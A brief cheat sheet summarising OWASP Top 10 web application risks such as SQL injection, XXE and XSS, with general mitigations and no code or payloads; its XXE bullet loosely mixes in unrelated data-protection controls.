One Pager Cheat Sheet

• As developers, we should make more of an effort to protect and secure our web applications by following various rules, such as those prescribed by the Open Web Application Security Project (OWASP) and its OWASP Top 10, which outlines the top 10 most critical security risks and how to avoid them.
• SQL injection is a security flaw in web applications that attackers exploit to gain direct access to the database, with the goal of making the application do something it was not designed to do.
• XXE issues can be prevented by classifying and identifying sensitive data according to privacy laws, regulatory requirements, or business needs, and applying adequate controls, such as using less complex data formats, avoiding serialization of sensitive data, and implementing multi-factor authentication and positive ("whitelisting") server-side input validation.
• By using JSON instead of XML, implementing positive input validation and XSD validation, the risk of an XML External Entities (XXE) attack can be reduced.
• Common attacks and their respective solutions are broken access control, security misconfiguration, Cross-Site Scripting (XSS), and insecure deserialization, which can be mitigated by implementing access control mechanisms, removing/not installing unused features and frameworks, escaping XSS and HTTP requests, and ensuring integrity of serialized objects.
• XSS is a type of attack where an attacker injects malicious code into a website in order to steal session cookies and gain unauthorized access to a user's account.
• Applications are vulnerable to attack when they are built and run with known vulnerable components and insufficient logging and monitoring, requiring removal of unused dependencies and continuous inventorying of components, as well as establishing effective monitoring, alerting, and log generation.
• Logging and monitoring are essential to properly secure an application, providing visibility into events and behaviors to help detect and respond to malicious activities quickly.